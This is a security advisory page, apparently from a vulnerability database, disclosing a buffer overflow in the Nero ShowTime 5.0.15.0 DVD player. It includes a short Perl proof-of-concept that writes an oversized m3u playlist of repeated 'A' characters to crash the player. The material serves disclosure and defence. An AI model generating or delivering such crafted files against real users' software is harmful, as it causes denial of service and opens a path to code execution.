Gjoko KrsticZSL-2008-4902Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
7.7 High
AI Score
Confidence
Low
0.093 Low
EPSS
Percentile
94.7%
Title: Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
Advisory ID: ZSL-2008-4902
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 24.11.2008
Summary
Nero ShowTime provides you with a high-performance software DVD player that takes you to a new dimension in DVD’s. Its cinema-like sound and excellent image quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime supports all DVD-Video formats and can play them from a disc and from the hard drive.
Description
Nero ShowTime is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
Vendor
Nero AG / Nero Inc. / Nero K.K. / Nero Ltd - <http://www.nero.com>
Affected Version
5.0.15.0
Tested On
Microsoft Windows XP Professional SP2 (English)
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://xforce.iss.net/xforce/xfdb/46811>
[2] <http://secunia.com/advisories/32850/>
[3] <http://www.milw0rm.com/exploits/7207>
[4] <http://www.packetstormsecurity.org/filedesc/showtime_bof.pl.txt.html>
[5] <http://www.securityfocus.com/bid/32446>
[6] <https://vulners.com/cve/CVE-2008-7079>
[7] <http://osvdb.org/50199>
[8] <http://www.exploit-db.com/exploits/7207>
Changelog
[24.11.2008] - Initial release
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/perl -w
#
# Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC
#
# Summary: Nero ShowTime provides you with a high-performance software DVD player
# that takes you to a new dimension in DVD's. Its cinema-like sound and excellent image
# quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime
# supports all DVD-Video formats and can play them from a disc and from the hard drive.
#
# Product web page: http://www.nero.com
#
# Description: Nero ShowTime is prone to a buffer-overflow vulnerability because it fails
# to perform adequate boundary checks on user-supplied input. Successfully exploiting
# these issues may allow remote attackers to execute arbitrary code in the context of the
# application. Failed exploit attempts will cause denial-of-service conditions. Nero ShowTime
# 5.0.15.0 is vulnerable, prior versions may also be affected.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [ t00t ] gmail [ d0t ] com
#
# 24.11.2008
#
$filename = "Jackie_Chan.m3u";
$mana = "A" x 432809;
print "\n\n[*] Creating evul playlist: $filename ...\r\n";
sleep(3);
open(m3u, ">./$filename") || die "\n\aCannot open $filename: $!";
print m3u "$mana";
close (m3u);
print "\n[*] Playlist file successfully created!\r\n";</p></body></html>Related
9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
7.7 High
AI Score
Confidence
Low
0.093 Low
EPSS
Percentile
94.7%